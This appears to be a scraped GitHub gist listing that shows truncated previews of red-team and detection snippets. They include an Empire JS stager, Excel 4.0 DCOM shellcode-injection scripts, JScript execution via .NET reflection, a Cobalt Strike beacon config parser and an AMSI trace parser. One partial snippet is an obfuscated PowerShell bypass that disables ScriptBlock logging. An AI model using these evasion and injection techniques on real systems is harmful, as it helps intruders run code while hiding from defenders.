2XXE GeneralTesler

infosecn1nja /
Created Jul 21, 2017
Empire stager module to generate a .js launcher.
from lib.common import helpers
class Stager:
def __init__(self, mainMenu, params=[]): = {
'Name': 'JS Launcher StarFighter',
'Author': ['Cn33liz'],
View jwtex_test.go
package jwtex
import (
obscuresec / dirtywebserver.ps1
Created May 18, 2014
Dirty PowerShell Webserver
View dirtywebserver.ps1
$Hso = New-Object Net.HttpListener
While ($Hso.IsListening) {
$HC = $Hso.GetContext()
$HRes = $HC.Response
$Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
$HRes.ContentLength64 = $Buf.Length
jcpowermac /
Last active Jun 4, 2020
windows kubevirt

Windows Image Template

yum install /usr/bin/virt-install virtio-win
virt-install \
  --name 2016 \
 --memory 8192 \
View Invoke-Excel4DCOM64.ps1
# Invoke-Excel4DCOM64.ps1
# Inject shellcode into excel.exe via ExecuteExcel4Macro through DCOM, Now with x64 support
# Author: Stan Hegt (@StanHacked) / Outflank, x64 support by Philip Tsukerman (@PhilipTsukerman) / Cybereason
# Date: 2019/04/21
# Version: 1.1
function Invoke-Excel4DCOM
View Invoke-ExShellcode.ps1
Lateral movement and shellcode injection via Excel 4.0 macros
Author: Philip Tsukerman (@PhilipTsukerman)
License: BSD 3-Clause
Based on Invoke-Excel4DCOM by Stan Hegt (@StanHacked) / Outflank -
function Invoke-ExShellcode
gabemarshall / jscript.ps1
Created Jan 3, 2018
Executing JScript from PowerShell via .NET reflection
View jscript.ps1
$js = 'var js = new ActiveXObject("WScript.Shell");js.Run("calc");'
cobbr / ScriptBlockLogBypass.ps1
Last active Sep 19, 2021
ScriptBlock Logging Bypass
View ScriptBlockLogBypass.ps1
# ScriptBlock Logging Bypass
# @cobbr_io
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static')
If ($GroupPolicyField) {
$GroupPolicyCache = $GroupPolicyField.GetValue($null)
If ($GroupPolicyCache['ScriptB'+'lockLogging']) {
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0
View beacon.ksy
id: beaconconfig
title: Cobalt Strike Beacon Config
endian: be
doc: |
Cobalt Strike Beacon is a popular offensive security tool. Beacon itself
is a DLL that gets injected into memory and can be staged from C2 servers.
The Beacon DLL (in unencoded form) contains a configuration section that gets
patched by the C2 server. This section is a fixed predictable structure
mgraeber-rc / GetAMSIEvent.ps1
Created Oct 8, 2021
A simple AMSI event trace parser
View GetAMSIEvent.ps1
# Author: Matt Graeber
# Company: Red Canary
# To start a trace, run the following from an elevated command prompt: logman start AMSITrace -p Microsoft-Antimalware-Scan-Interface Event1 -o AMSITrace.etl -ets
# To stop the trace, run the following: logman stop AMSITrace -ets
# Example usage: Get-AMSIEvent -Path .\AMSITrace.etl
function Get-AMSIEvent {
param (